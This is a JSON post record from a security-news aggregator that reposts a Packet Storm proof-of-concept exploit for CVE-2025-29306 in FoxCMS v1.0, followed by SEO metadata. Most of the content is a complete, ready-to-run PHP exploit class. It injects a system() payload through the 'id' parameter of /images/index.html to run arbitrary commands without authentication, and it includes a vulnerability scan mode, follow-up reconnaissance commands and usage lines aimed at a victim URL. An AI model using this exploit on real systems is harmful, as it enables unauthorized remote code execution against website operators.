{"id":31171,"date":"2025-12-15T11:42:57","date_gmt":"2025-12-15T11:42:57","guid":{"rendered":"http:\/\/localhost\/?p=31171"},"modified":"2025-12-15T11:42:57","modified_gmt":"2025-12-15T11:42:57","slug":"foxcms-10-code-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31171","title":{"rendered":"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:52:10&#8243;,&#8221;description&#8221;:&#8221;FoxCMS version 1.0 proof of concept remote code injection exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 FoxCMS 1.0 Code Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212824&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-29306&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : FoxCMS v1.0 php code innjection                                                                                             |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/sourceforge.net\/projects\/fox-cms\/                                                                                   |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/190551\/ \\u0026 CVE-2025-29306\\n    \\n    \\n    [+] Summary\\n       \\n        A critical remote code execution vulnerability exists in FoxCMS v1.0 that allows unauthenticated attackers to execute arbitrary operating system commands \\n    \\tvia the &#8216;id&#8217; parameter in the \/images\/index.html endpoint. \\n    \\tThe vulnerability stems from improper input sanitization and direct code evaluation.\\n    \\t\\n    \\tThe vulnerability exists in the FoxCMS v1.0 \/images\/index.html endpoint where user-supplied input in the &#8216;id&#8217; parameter is directly evaluated without proper sanitization. \\n    \\tThe system fails to validate and sanitize user input, allowing attackers to inject and execute arbitrary PHP code.\\n    \\n    [+] Vulnerable Code Pattern:\\n    \\n    &#8220;`php\\n    \\n    \/\/ In \/images\/index.html or related component\\n    \\n    \\u003c?php\\n    \/\/ Vulnerable code structure (reconstructed)\\n    $user_input = $_GET[&#8216;id&#8217;];\\n    \/\/ Input is directly evaluated without sanitization\\n    eval(\\&#8221;some_function($user_input);\\&#8221;);\\n    \/\/ Or similar dangerous construct\\n    ?\\u003e\\n    \\n    [+] Usage: \\n    \\n    Usage: php exploit.php https:\/\/victim.com \\&#8221;id\\&#8221;\\n    \\n    [+] POC :\\n    \\n    \\u003c?php\\n    \/**\\n     * CVE-2025-29306 Exploit &#8211; FoxCMS v1.0 Remote Code Execution\\n     * By: indoushka\\n     * Vulnerability: RCE via \/images\/index.html id parameter\\n     *\/\\n    \\n    class FoxCMSExploit {\\n        private $colors;\\n        \\n        public function __construct() {\\n            $this-\\u003ecolors = [\\n                &#8216;RED&#8217;     =\\u003e \\&#8221;\\\\033[91m\\&#8221;,\\n                &#8216;GREEN&#8217;   =\\u003e \\&#8221;\\\\033[92m\\&#8221;,\\n                &#8216;YELLOW&#8217;  =\\u003e \\&#8221;\\\\033[93m\\&#8221;,\\n                &#8216;BLUE&#8217;    =\\u003e \\&#8221;\\\\033[94m\\&#8221;,\\n                &#8216;MAGENTA&#8217; =\\u003e \\&#8221;\\\\033[95m\\&#8221;,\\n                &#8216;CYAN&#8217;    =\\u003e \\&#8221;\\\\033[96m\\&#8221;,\\n                &#8216;WHITE&#8217;   =\\u003e \\&#8221;\\\\033[97m\\&#8221;,\\n                &#8216;BOLD&#8217;    =\\u003e \\&#8221;\\\\033[1m\\&#8221;,\\n                &#8216;RESET&#8217;   =\\u003e \\&#8221;\\\\033[0m\\&#8221;\\n            ];\\n        }\\n        \\n        private function color($text, $color) {\\n            return $this-\\u003ecolors[$color] . $text . $this-\\u003ecolors[&#8216;RESET&#8217;];\\n        }\\n        \\n        private function showBanner() {\\n            $banner = $this-\\u003ecolor(\\&#8221;\\n    \\n    \\&#8221;, &#8216;CYAN&#8217;) . \\n    $this-\\u003ecolor(\\&#8221;\\n    \\n    \\&#8221;, &#8216;MAGENTA&#8217;) .\\n    $this-\\u003ecolor(\\&#8221;\\\\n        CVE-2025-29306 &#8211; FoxCMS v1.0 RCE Exploit\\\\n\\&#8221;, &#8216;RED&#8217;) .\\n    $this-\\u003ecolor(\\&#8221;                    @indoushka\\\\n\\\\n\\&#8221;, &#8216;WHITE&#8217;);\\n    \\n            echo $banner;\\n        }\\n        \\n        private function makeRequest($url) {\\n            $context = stream_context_create([\\n                &#8216;http&#8217; =\\u003e [\\n                    &#8216;timeout&#8217; =\\u003e 10,\\n                    &#8216;ignore_errors&#8217; =\\u003e true,\\n                    &#8216;user_agent&#8217; =\\u003e &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;\\n                ],\\n                &#8216;ssl&#8217; =\\u003e [\\n                    &#8216;verify_peer&#8217; =\\u003e false,\\n                    &#8216;verify_peer_name&#8217; =\\u003e false\\n                ]\\n            ]);\\n            \\n            $response = @file_get_contents($url, false, $context);\\n            \\n            if ($response === false) {\\n                return [&#8216;success&#8217; =\\u003e false, &#8216;error&#8217; =\\u003e &#8216;Request failed&#8217;];\\n            }\\n            \\n            return [&#8216;success&#8217; =\\u003e true, &#8216;content&#8217; =\\u003e $response];\\n        }\\n        \\n        private function extractCommandOutput($html) {\\n            \/\/ Try multiple extraction methods\\n            $output = &#8221;;\\n            \\n            \/\/ Method 1: Simple tag stripping\\n            $cleaned = strip_tags($html);\\n            \\n            \/\/ Method 2: Look for command output patterns\\n            if (preg_match(&#8216;\/\\u003cul[^\\u003e]*\\u003e(.*?)\\u003c\\\\\/ul\\u003e\/si&#8217;, $html, $matches)) {\\n                $output = strip_tags($matches[1]);\\n            }\\n            \\n            \/\/ Method 3: Extract between common output markers\\n            if (preg_match(&#8216;\/\\\\b(root|bin|daemon|system)\\\\b\/i&#8217;, $cleaned)) {\\n                $output = $cleaned;\\n            }\\n            \\n            \/\/ Clean up the output\\n            $output = preg_replace(&#8216;\/\\\\s+\/&#8217;, &#8216; &#8216;, $output);\\n            $output = trim($output);\\n            \\n            return $output ?: $cleaned;\\n        }\\n        \\n        public function execute($target, $command) {\\n            $this-\\u003eshowBanner();\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Target: \\&#8221;, &#8216;BLUE&#8217;) . $target . \\&#8221;\\\\n\\&#8221;;\\n            echo $this-\\u003ecolor(\\&#8221;[*] Command: \\&#8221;, &#8216;BLUE&#8217;) . $command . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            \\n            \/\/ Construct the exploit URL\\n            $payload = &#8216;${@print_r(@system(\\&#8221;&#8216; . $command . &#8216;\\&#8221;))}&#8217;;\\n            $encodedPayload = urlencode($payload);\\n            \\n            $exploitUrl = rtrim($target, &#8216;\/&#8217;) . &#8216;\/images\/index.html?id=&#8217; . $encodedPayload;\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Sending RCE payload&#8230;\\&#8221;, &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            echo $this-\\u003ecolor(\\&#8221;[*] Exploit URL: \\&#8221;, &#8216;CYAN&#8217;) . $exploitUrl . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            \\n            $response = $this-\\u003emakeRequest($exploitUrl);\\n            \\n            if (!$response[&#8216;success&#8217;]) {\\n                echo $this-\\u003ecolor(\\&#8221;[!] Request failed: \\&#8221; . $response[&#8216;error&#8217;], &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                return;\\n            }\\n            \\n            $output = $this-\\u003eextractCommandOutput($response[&#8216;content&#8217;]);\\n            \\n            if (empty(trim($output))) {\\n                echo $this-\\u003ecolor(\\&#8221;[!] No command output received\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                echo $this-\\u003ecolor(\\&#8221;[*] Response preview:\\&#8221;, &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                echo substr($response[&#8216;content&#8217;], 0, 500) . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            } else {\\n                echo $this-\\u003ecolor(\\&#8221;[+] Command output:\\&#8221;, &#8216;GREEN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                echo $this-\\u003ecolor(str_repeat(\\&#8221;=\\&#8221;, 60), &#8216;CYAN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                echo $output . \\&#8221;\\\\n\\&#8221;;\\n                echo $this-\\u003ecolor(str_repeat(\\&#8221;=\\&#8221;, 60), &#8216;CYAN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            }\\n            \\n            \/\/ Test additional commands for verification\\n            $this-\\u003etestAdditionalCommands($target);\\n        }\\n        \\n        private function testAdditionalCommands($target) {\\n            echo $this-\\u003ecolor(\\&#8221;\\\\n[*] Testing additional verification commands&#8230;\\&#8221;, &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            \\n            $testCommands = [\\n                &#8216;whoami&#8217; =\\u003e &#8216;Current user&#8217;,\\n                &#8216;pwd&#8217; =\\u003e &#8216;Current directory&#8217;,\\n                &#8216;uname -a&#8217; =\\u003e &#8216;System information&#8217;\\n            ];\\n            \\n            foreach ($testCommands as $cmd =\\u003e $description) {\\n                $payload = &#8216;${@print_r(@system(\\&#8221;&#8216; . $cmd . &#8216;\\&#8221;))}&#8217;;\\n                $encodedPayload = urlencode($payload);\\n                $testUrl = rtrim($target, &#8216;\/&#8217;) . &#8216;\/images\/index.html?id=&#8217; . $encodedPayload;\\n                \\n                $response = $this-\\u003emakeRequest($testUrl);\\n                if ($response[&#8216;success&#8217;]) {\\n                    $output = $this-\\u003eextractCommandOutput($response[&#8216;content&#8217;]);\\n                    if (!empty(trim($output))) {\\n                        echo $this-\\u003ecolor(\\&#8221;[+] $description: \\&#8221;, &#8216;GREEN&#8217;) . trim($output) . \\&#8221;\\\\n\\&#8221;;\\n                    }\\n                }\\n            }\\n        }\\n        \\n        public function scan($target) {\\n            $this-\\u003eshowBanner();\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Scanning target for FoxCMS vulnerability: \\&#8221;, &#8216;BLUE&#8217;) . $target . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            \\n            $testUrl = rtrim($target, &#8216;\/&#8217;) . &#8216;\/images\/index.html&#8217;;\\n            \\n            \/\/ First check if endpoint exists\\n            echo $this-\\u003ecolor(\\&#8221;[*] Checking if \/images\/index.html exists&#8230;\\&#8221;, &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            $response = $this-\\u003emakeRequest($testUrl);\\n            \\n            if (!$response[&#8216;success&#8217;]) {\\n                echo $this-\\u003ecolor(\\&#8221;[-] Endpoint not accessible\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[+] Endpoint is accessible\\&#8221;, &#8216;GREEN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            \\n            \/\/ Test with simple command\\n            $testCommand = &#8216;echo \\&#8221;VULNERABLE\\&#8221;&#8216;;\\n            $payload = &#8216;${@print_r(@system(\\&#8221;&#8216; . $testCommand . &#8216;\\&#8221;))}&#8217;;\\n            $encodedPayload = urlencode($payload);\\n            \\n            $exploitUrl = $testUrl . &#8216;?id=&#8217; . $encodedPayload;\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Testing for RCE vulnerability&#8230;\\&#8221;, &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            $response = $this-\\u003emakeRequest($exploitUrl);\\n            \\n            if ($response[&#8216;success&#8217;] \\u0026\\u0026 strpos($response[&#8216;content&#8217;], &#8216;VULNERABLE&#8217;) !== false) {\\n                echo $this-\\u003ecolor(\\&#8221;[+] Target is VULNERABLE to CVE-2025-29306!\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                return true;\\n            } else {\\n                echo $this-\\u003ecolor(\\&#8221;[-] Target does not appear to be vulnerable\\&#8221;, &#8216;GREEN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n    }\\n    \\n    \/\/ Main execution\\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        if ($argc \\u003c 2) {\\n            echo \\&#8221;CVE-2025-29306 &#8211; FoxCMS v1.0 RCE Exploit\\\\n\\&#8221;;\\n            echo \\&#8221;Usage:\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php \\u003ctarget_url\\u003e [command]\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php \\u003ctarget_url\\u003e &#8211;scan\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nExamples:\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php https:\/\/victim.com \\\\\\&#8221;id\\\\\\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php https:\/\/victim.com \\\\\\&#8221;ls -la\\\\\\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php https:\/\/victim.com &#8211;scan\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nDescription:\\\\n\\&#8221;;\\n            echo \\&#8221;  Exploits RCE vulnerability in FoxCMS v1.0 via \/images\/index.html id parameter\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $target = $argv[1];\\n        $command = $argv[2] ?? &#8216;&#8211;scan&#8217;;\\n        \\n        if (!filter_var($target, FILTER_VALIDATE_URL)) {\\n            echo \\&#8221;Error: Invalid target URL\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $exploit = new FoxCMSExploit();\\n        \\n        if ($command === &#8216;&#8211;scan&#8217;) {\\n            $exploit-\\u003escan($target);\\n        } else {\\n            $exploit-\\u003eexecute($target, $command);\\n        }\\n    } else {\\n        echo \\&#8221;This script is intended for command line use only.\\\\n\\&#8221;;\\n    }\\n    ?\\u003e\\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212824&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212824\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:52:10&#8243;,&#8221;description&#8221;:&#8221;FoxCMS version 1.0 proof of concept remote code injection exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 FoxCMS 1.0 Code Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212824&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-29306&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : FoxCMS v1.0 php code innjection |\\n |&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-31171","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31171\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:52:10&#8243;,&#8221;description&#8221;:&#8221;FoxCMS version 1.0 proof of concept remote code injection exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 FoxCMS 1.0 Code Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212824&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-29306&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : FoxCMS v1.0 php code innjection |n |...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31171\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-15T11:42:57+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31171#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31171\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824\",\"datePublished\":\"2025-12-15T11:42:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31171\"},\"wordCount\":1368,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31171#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31171\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31171\",\"name\":\"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-15T11:42:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31171#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31171\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31171#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31171","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:52:10&#8243;,&#8221;description&#8221;:&#8221;FoxCMS version 1.0 proof of concept remote code injection exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 FoxCMS 1.0 Code Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212824&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-29306&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : FoxCMS v1.0 php code innjection |n |...","og_url":"https:\/\/zero.redgem.net\/?p=31171","og_site_name":"zero redgem","article_published_time":"2025-12-15T11:42:57+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31171#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31171"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824","datePublished":"2025-12-15T11:42:57+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31171"},"wordCount":1368,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31171#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31171","url":"https:\/\/zero.redgem.net\/?p=31171","name":"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-15T11:42:57+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31171#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31171"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31171#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 FoxCMS 1.0 Code Injection_PACKETSTORM:212824"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 